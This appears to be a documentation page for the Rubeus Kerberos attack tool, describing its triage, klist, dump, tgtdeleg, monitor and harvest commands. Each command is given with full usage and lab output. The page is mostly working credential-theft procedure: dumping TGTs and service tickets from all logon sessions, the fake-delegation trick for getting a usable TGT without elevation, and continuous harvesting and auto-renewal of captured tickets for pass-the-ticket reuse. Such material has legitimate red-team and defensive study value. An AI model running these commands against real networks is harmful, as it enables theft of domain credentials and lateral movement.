Ticket Extraction and Harvesting

Breakdown of the ticket extraction/harvesting commands:

The triage, klist, and dump commands give increasing amounts of ticket detail.

triage

The triage action will output a table of the current user's Kerberos tickets, if not elevated. If run from an elevated context, a table describing all Kerberos tickets on the system is displayed. Ticket can be filtered for a specific service with /service:SNAME.

If elevated, tickets can be filtered for a specific LogonID with /luid:0xA.. or a specific user with /user:USER. This can be useful when triaging systems with a lot of Kerberos tickets.

Triage all enumerateable tickets (non-elevated):

C:\Rubeus>Rubeus.exe triage

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.4



[*] Action: Triage Kerberos Tickets (Current User)

[*] Current LUID    : 0x4420e

-----------------------------------------------------------------------------------------
| LUID    | UserName                | Service                    | EndTime              |
-----------------------------------------------------------------------------------------
| 0x4420e | harmj0y @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL       | 2/12/2019 4:04:14 PM |
| 0x4420e | harmj0y @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL       | 2/12/2019 4:04:14 PM |
| 0x4420e | harmj0y @ TESTLAB.LOCAL | cifs/primary.testlab.local | 2/12/2019 4:04:14 PM |
-----------------------------------------------------------------------------------------

Triage all enumerateable tickets (elevated):

C:\Rubeus>Rubeus.exe triage

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.4



[*] Action: Triage Kerberos Tickets (All Users)

-------------------------------------------------------------------------------------------------------------
| LUID      | UserName                   | Service                                  | EndTime               |
-------------------------------------------------------------------------------------------------------------
| 0x56cdda9 | harmj0y @ TESTLAB.LOCAL    | krbtgt/TESTLAB.LOCAL                     | 2/12/2019 4:04:14 PM  |
| 0x56cdda9 | harmj0y @ TESTLAB.LOCAL    | krbtgt/TESTLAB.LOCAL                     | 2/12/2019 4:04:14 PM  |
| 0x56cdda9 | harmj0y @ TESTLAB.LOCAL    | cifs/primary.testlab.local               | 2/12/2019 4:04:14 PM  |
| 0x56cdd86 | harmj0y @ TESTLAB.LOCAL    | krbtgt/TESTLAB.LOCAL                     | 2/12/2019 4:04:02 PM  |
| 0x47869cc | harmj0y @ TESTLAB.LOCAL    | krbtgt/TESTLAB.LOCAL                     | 2/12/2019 3:19:11 PM  |
| 0x47869cc | harmj0y @ TESTLAB.LOCAL    | krbtgt/TESTLAB.LOCAL                     | 2/12/2019 3:19:11 PM  |
| 0x47869cc | harmj0y @ TESTLAB.LOCAL    | cifs/primary.testlab.local               | 2/12/2019 3:19:11 PM  |
| 0x47869b4 | harmj0y @ TESTLAB.LOCAL    | krbtgt/TESTLAB.LOCAL                     | 2/12/2019 3:05:29 PM  |
| 0x3c4c241 | dfm.a @ TESTLAB.LOCAL      | krbtgt/TESTLAB.LOCAL                     | 2/11/2019 4:24:02 AM  |
| 0x441d8   | dfm.a @ TESTLAB.LOCAL      | cifs/primary.testlab.local               | 2/10/2019 11:41:26 PM |
| 0x441d8   | dfm.a @ TESTLAB.LOCAL      | LDAP/primary.testlab.local               | 2/10/2019 11:41:26 PM |
| 0x3e4     | windows10$ @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL                     | 2/12/2019 1:25:01 PM  |
| 0x3e4     | windows10$ @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL                     | 2/12/2019 1:25:01 PM  |
| 0x3e4     | windows10$ @ TESTLAB.LOCAL | cifs/PRIMARY.testlab.local               | 2/12/2019 1:25:01 PM  |
| 0x3e4     | windows10$ @ TESTLAB.LOCAL | ldap/primary.testlab.local/testlab.local | 2/11/2019 7:23:48 PM  |
| 0x3e7     | windows10$ @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL                     | 2/12/2019 2:23:45 PM  |
| 0x3e7     | windows10$ @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL                     | 2/12/2019 2:23:45 PM  |
| 0x3e7     | windows10$ @ TESTLAB.LOCAL | cifs/PRIMARY.testlab.local/testlab.local | 2/12/2019 2:23:45 PM  |
| 0x3e7     | windows10$ @ TESTLAB.LOCAL | WINDOWS10$                               | 2/12/2019 2:23:45 PM  |
| 0x3e7     | windows10$ @ TESTLAB.LOCAL | LDAP/PRIMARY.testlab.local/testlab.local | 2/12/2019 2:23:45 PM  |
-------------------------------------------------------------------------------------------------------------

Triage targeting a specific service (elevated):

C:\Rubeus>Rubeus.exe triage /service:ldap

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.4



[*] Action: Triage Kerberos Tickets (All Users)

[*] Target service  : ldap

-----------------------------------------------------------------------------------------------------------
| LUID    | UserName                   | Service                                  | EndTime               |
-----------------------------------------------------------------------------------------------------------
| 0x441d8 | dfm.a @ TESTLAB.LOCAL      | LDAP/primary.testlab.local               | 2/10/2019 11:41:26 PM |
| 0x3e4   | windows10$ @ TESTLAB.LOCAL | ldap/primary.testlab.local/testlab.local | 2/11/2019 7:23:48 PM  |
| 0x3e7   | windows10$ @ TESTLAB.LOCAL | LDAP/PRIMARY.testlab.local/testlab.local | 2/12/2019 2:23:45 PM  |
-----------------------------------------------------------------------------------------------------------

klist

The klist will list detailed information on the current user's logon session and Kerberos tickets, if not elevated. If run from an elevated context, information on all logon sessions and associated Kerberos tickets is displayed. Logon and ticket information can be displayed for a specific LogonID with /luid:0xA.. (if elevated).

Listing the current (non-elevated) user's logon session and Kerberos ticket information:

C:\Rubeus>Rubeus.exe klist

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.4



[*] Action: List Kerberos Tickets (Current User)

[*] Current LUID    : 0x4420e

    [0] - 0x12 - aes256_cts_hmac_sha1
    Start/End/MaxRenew: 2/12/2019 11:04:14 AM ; 2/12/2019 4:04:14 PM ; 2/19/2019 11:04:14 AM
    Server Name       : krbtgt/TESTLAB.LOCAL @ TESTLAB.LOCAL
    Client Name       : harmj0y @ TESTLAB.LOCAL
    Flags             : name_canonicalize, pre_authent, renewable, forwarded, forwardable (60a10000)

    ...(snip)...

Elevated listing of another user's logon session/Kerberos ticket information:

C:\Rubeus>Rubeus.exe klist /luid:0x47869b4

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.3



[*] Action: List Kerberos Tickets (All Users)

[*] Target LUID     : 0x47869b4

UserName                 : harmj0y
Domain                   : TESTLAB
LogonId                  : 0x47869b4
UserSID                  : S-1-5-21-883232822-274137685-4173207997-1111
AuthenticationPackage    : Kerberos
LogonType                : Interactive
LogonTime                : 2/11/2019 11:05:31 PM
LogonServer              : PRIMARY
LogonServerDNSDomain     : TESTLAB.LOCAL
UserPrincipalName        : harmj0y@testlab.local

    [0] - 0x12 - aes256_cts_hmac_sha1
    Start/End/MaxRenew: 2/11/2019 3:05:31 PM ; 2/11/2019 8:05:31 PM ; 2/18/2019 3:05:31 PM
    Server Name       : krbtgt/TESTLAB.LOCAL @ TESTLAB.LOCAL
    Client Name       : harmj0y @ TESTLAB.LOCAL
    Flags             : name_canonicalize, pre_authent, initial, renewable, forwardable (40e10000)

    ...(snip)...

dump

The dump action will extract current TGTs and service tickets if in an elevated context. If not elevated, service tickets for the current user are extracted. The resulting extracted tickets can be filtered by /service (use /service:krbtgt for TGTs) and/or logon ID (the /luid:0xA.. parameter). The KRB-CRED files (.kirbis) are output as base64 blobs and can be reused with the ptt function, or Mimikatz's kerberos::ptt functionality.

Note: if run from a non-elevated context, the session keys for TGTs are not returned (by default) from the associated APIs, so only service tickets extracted will be usable. If you want to (somewhat) workaround this, use the tgtdeleg command.

Extracting the current user's usable service tickets:

C:\Rubeus>Rubeus.exe dump

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.4



[*] Action: Dump Kerberos Ticket Data (Current User)

[*] Current LUID    : 0x4420e

[*] Returned 3 tickets

ServiceName              : krbtgt/TESTLAB.LOCAL
TargetName               : krbtgt/TESTLAB.LOCAL
ClientName               : harmj0y
DomainName               : TESTLAB.LOCAL
TargetDomainName         : TESTLAB.LOCAL
AltTargetDomainName      : TESTLAB.LOCAL
SessionKeyType           : rc4_hmac
Base64SessionKey         : AAAAAAAAAAAAAAAAAAAAAA==
KeyExpirationTime        : 12/31/1600 4:00:00 PM
TicketFlags              : name_canonicalize, pre_authent, renewable, forwarded, forwardable
StartTime                : 2/11/2019 3:19:15 PM
EndTime                  : 2/11/2019 8:19:13 PM
RenewUntil               : 2/18/2019 3:19:13 PM
TimeSkew                 : 0
EncodedTicketSize        : 1306
Base64EncodedTicket      :

    doIFFjCCBRKgAwIBBaEDAgEWoo...(snip)...

...(snip)...



[*] Enumerated 3 total tickets
[*] Extracted  3 total tickets

Elevated extraction of tickets from a specific logon session:

C:\Rubeus>Rubeus.exe dump /luid:0x47869cc

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.3



[*] Action: Dump Kerberos Ticket Data (All Users)

[*] Target LUID: 0x47869cc

UserName                 : harmj0y
Domain                   : TESTLAB
LogonId                  : 0x47869cc
UserSID                  : S-1-5-21-883232822-274137685-4173207997-1111
AuthenticationPackage    : Negotiate
LogonType                : Interactive
LogonTime                : 2/11/2019 11:05:31 PM
LogonServer              : PRIMARY
LogonServerDNSDomain     : TESTLAB.LOCAL
UserPrincipalName        : harmj0y@testlab.local

    [*] Enumerated 3 ticket(s):

    ServiceName              : krbtgt/TESTLAB.LOCAL
    TargetName               : krbtgt/TESTLAB.LOCAL
    ClientName               : harmj0y
    DomainName               : TESTLAB.LOCAL
    TargetDomainName         : TESTLAB.LOCAL
    AltTargetDomainName      : TESTLAB.LOCAL
    SessionKeyType           : rc4_hmac
    Base64SessionKey         : u9DOCzuGKAZB6h/E/9XcFg==
    KeyExpirationTime        : 12/31/1600 4:00:00 PM
    TicketFlags              : name_canonicalize, pre_authent, renewable, forwarded, forwardable
    StartTime                : 2/11/2019 3:21:53 PM
    EndTime                  : 2/11/2019 8:19:13 PM
    RenewUntil               : 2/18/2019 3:19:13 PM
    TimeSkew                 : 0
    EncodedTicketSize        : 1306
    Base64EncodedTicket      :

    doIFFjCCBRKgAwIBBaEDAgEWoo...(snip)...

    ServiceName              : krbtgt/TESTLAB.LOCAL
    TargetName               : krbtgt/TESTLAB.LOCAL
    ClientName               : harmj0y
    DomainName               : TESTLAB.LOCAL
    TargetDomainName         : TESTLAB.LOCAL
    AltTargetDomainName      : TESTLAB.LOCAL
    SessionKeyType           : aes256_cts_hmac_sha1
    Base64SessionKey         : tKcszT8rdYyxBxBHlkpmJ/SEsfON8mBMs4ZN/29Xv8A=
    KeyExpirationTime        : 12/31/1600 4:00:00 PM
    TicketFlags              : name_canonicalize, pre_authent, initial, renewable, forwardable
    StartTime                : 2/11/2019 3:19:13 PM
    EndTime                  : 2/11/2019 8:19:13 PM
    RenewUntil               : 2/18/2019 3:19:13 PM
    TimeSkew                 : 0
    EncodedTicketSize        : 1338
    Base64EncodedTicket      :

    doIFNjCCBTKgAwIBBaEDAgEWoo...(snip)...

    ...(snip)...


[*] Enumerated 3 total tickets
[*] Extracted  3 total tickets

Elevated extraction of all TGTs on a system:

C:\Rubeus>Rubeus.exe dump /service:krbtgt

 ______        _                      
(_____ \      | |                     
 _____) )_   _| |__  _____ _   _  ___ 
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.3



[*] Action: Dump Kerberos Ticket Data (All Users)

[*] Target service  : krbtgt


UserName                 : harmj0y
Domain                   : TESTLAB
LogonId                  : 0x47869cc
UserSID                  : S-1-5-21-883232822-274137685-4173207997-1111
AuthenticationPackage    : Negotiate
LogonType                : Interactive
LogonTime                : 2/11/2019 11:05:31 PM
LogonServer              : PRIMARY
LogonServerDNSDomain     : TESTLAB.LOCAL
UserPrincipalName        : harmj0y@testlab.local

    [*] Enumerated 3 ticket(s):

    ServiceName              : krbtgt/TESTLAB.LOCAL
    TargetName               : krbtgt/TESTLAB.LOCAL
    ClientName               : harmj0y
    DomainName               : TESTLAB.LOCAL
    TargetDomainName         : TESTLAB.LOCAL
    AltTargetDomainName      : TESTLAB.LOCAL
    SessionKeyType           : rc4_hmac
    Base64SessionKey         : y4LL+W3KZoOjnwsiwf150g==
    KeyExpirationTime        : 12/31/1600 4:00:00 PM
    TicketFlags              : name_canonicalize, pre_authent, renewable, forwarded, forwardable
    StartTime                : 2/11/2019 3:23:50 PM
    EndTime                  : 2/11/2019 8:19:13 PM
    RenewUntil               : 2/18/2019 3:19:13 PM
    TimeSkew                 : 0
    EncodedTicketSize        : 1306
    Base64EncodedTicket      :

    doIFFjCCBRKgAwIBBaEDAgEWoo...(snip)...

    ...(snip)...

UserName                 : WINDOWS10$
Domain                   : TESTLAB
LogonId                  : 0x3e4
UserSID                  : S-1-5-20
AuthenticationPackage    : Negotiate
LogonType                : Service
LogonTime                : 2/7/2019 4:51:20 PM
LogonServer              : 
LogonServerDNSDomain     : testlab.local
UserPrincipalName        : WINDOWS10$@testlab.local

    [*] Enumerated 4 ticket(s):

    ServiceName              : krbtgt/TESTLAB.LOCAL
    TargetName               : krbtgt/TESTLAB.LOCAL
    ClientName               : WINDOWS10$
    DomainName               : TESTLAB.LOCAL
    TargetDomainName         : TESTLAB.LOCAL
    AltTargetDomainName      : TESTLAB.LOCAL
    SessionKeyType           : rc4_hmac
    Base64SessionKey         : 0NgsSyZ/XOCTi9wLR1z9Kg==
    KeyExpirationTime        : 12/31/1600 4:00:00 PM
    TicketFlags              : name_canonicalize, pre_authent, renewable, forwarded, forwardable
    StartTime                : 2/11/2019 3:23:50 PM
    EndTime                  : 2/11/2019 7:23:48 PM
    RenewUntil               : 2/18/2019 2:23:48 PM
    TimeSkew                 : 0
    EncodedTicketSize        : 1304
    Base64EncodedTicket      :

    doIFFDCCBRCgAwIBBaEDAgEWoo...(snip)...

    ...(snip)...


[*] Enumerated 20 total tickets
[*] Extracted  9 total tickets

tgtdeleg

The tgtdeleg using @gentilkiwi's Kekeo trick (tgt::deleg) that abuses the Kerberos GSS-API to retrieve a usable TGT for the current user without needing elevation on the host. AcquireCredentialsHandle() is used to get a handle to the current user's Kerberos security credentials, and InitializeSecurityContext() with the ISC_REQ_DELEGATE flag and a target SPN of HOST/DC.domain.com to prepare a fake delegate context to send to the DC. This results in an AP-REQ in the GSS-API output that contains a KRB_CRED in the authenticator checksum. The service ticket session key is extracted from the local Kerberos cache and is used to decrypt the KRB_CRED in the authenticator, resulting in a usable TGT .kirbi.

If automatic target/domain extraction is failing, a known SPN of a service configured with unconstrained delegation can be specified with /target:SPN.

C:\Rubeus>Rubeus.exe tgtdeleg

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.3


[*] Action: Request Fake Delegation TGT (current user)

[*] No target SPN specified, attempting to build 'HOST/dc.domain.com'
[*] Initializing Kerberos GSS-API w/ fake delegation for target 'HOST/PRIMARY.testlab.local'
[+] Kerberos GSS-API initialization success!
[+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API output.
[*] Found the AP-REQ delegation ticket in the GSS-API output.
[*] Authenticator etype: aes256_cts_hmac_sha1
[*] Extracted the service ticket session key from the ticket cache: YnEFxPfqw3LdfNvLtdFfzaFf7zG3hG+HNjesy+6R+ys=
[+] Successfully decrypted the authenticator
[*] base64(ticket.kirbi):

    doIFNjCCBTKgAwIBBaEDAgEWoo...(snip)...

monitor

The monitor action will periodically extract all TGTs every /monitorinterval:X seconds (default of 60) and display any newly captured TGTs. A /targetuser:USER can be specified, returning only ticket data for said user. This function is especially useful on servers with unconstrained delegation enabled ;)

When the /targetuser:USER (or if not specified, any user) creates a new 4624 logon event, any extracted TGT KRB-CRED data is output.

The /nowrap flag causes the base64 encoded ticket output to no wrap per line.

If you want monitor to run for a specific period of time, use /runfor:SECONDS.

Further, if you wish to save the output to the registry, pass the /registry flag and specfiy a path under HKLM to create (e.g., /registry:SOFTWARE\MONITOR). Then you can remove this entry after you've finished running Rubeus by Get-Item HKLM:\SOFTWARE\MONITOR\ | Remove-Item -Recurse -Force.

c:\Rubeus>Rubeus.exe monitor /targetuser:DC$ /interval:10

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0

[*] Action: TGT Monitoring
[*] Target user     : DC$
[*] Monitoring every 10 seconds for new TGTs


[*] 12/21/2019 11:10:16 PM UTC - Found new TGT:

  User                  :  DC$@THESHIRE.LOCAL
  StartTime             :  12/21/2019 2:44:31 PM
  EndTime               :  12/21/2019 3:44:31 PM
  RenewTill             :  12/28/2019 2:13:06 PM
  Flags                 :  name_canonicalize, pre_authent, renewable, forwarded, forwardable
  Base64EncodedTicket   :

    doIFFDCCBRCgAwIBBaEDAgEWoo...(snip)...

[*] Ticket cache size: 1

Note that this action needs to be run from an elevated context!

harvest

The harvest action takes monitor one step further. It periodically extract all TGTs every /monitorinterval:X seconds (default of 60), extracts any new TGT KRB-CRED files, and keeps a cache of any extracted TGTs. Every interval, any TGTs that will expire before the next interval are automatically renewed (up until their renewal limit). Every /displayinterval:X seconds (default of 1200) and the current cache of "usable"/valid TGT KRB-CRED .kirbis are output as base64 blobs.

This allows you to harvest usable TGTs from a system without opening up a read handle to LSASS, though elevated rights are needed to extract the tickets.

The /nowrap flag causes the base64 encoded ticket output to no wrap per line.

If you want harvest to run for a specific period of time, use /runfor:SECONDS.

Further, if you wish to save the output to the registry, pass the /registry flag and specfiy a path under HKLM to create (e.g., /registry:SOFTWARE\MONITOR). Then you can remove this entry after you've finished running Rubeus by Get-Item HKLM:\SOFTWARE\MONITOR\ | Remove-Item -Recurse -Force.

c:\Rubeus>Rubeus.exe harvest /interval:30

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v0.0.1a

[*] Action: TGT Harvesting (w/ auto-renewal)

[*] Monitoring every 30 minutes for 4624 logon events

...(snip)...

[*] Renewing TGT for dfm.a@TESTLAB.LOCAL
[*] Connecting to 192.168.52.100:88
[*] Sent 1520 bytes
[*] Received 1549 bytes

[*] 9/17/2018 6:43:02 AM - Current usable TGTs:

User                  :  dfm.a@TESTLAB.LOCAL
StartTime             :  9/17/2018 6:43:02 AM
EndTime               :  9/17/2018 11:43:02 AM
RenewTill             :  9/24/2018 2:07:48 AM
Flags                 :  name_canonicalize, renewable, forwarded, forwardable
Base64EncodedTicket   :

    doIFujCCBbagAw...(snip)...

Note that this action needs to be run from an elevated context!

Last updated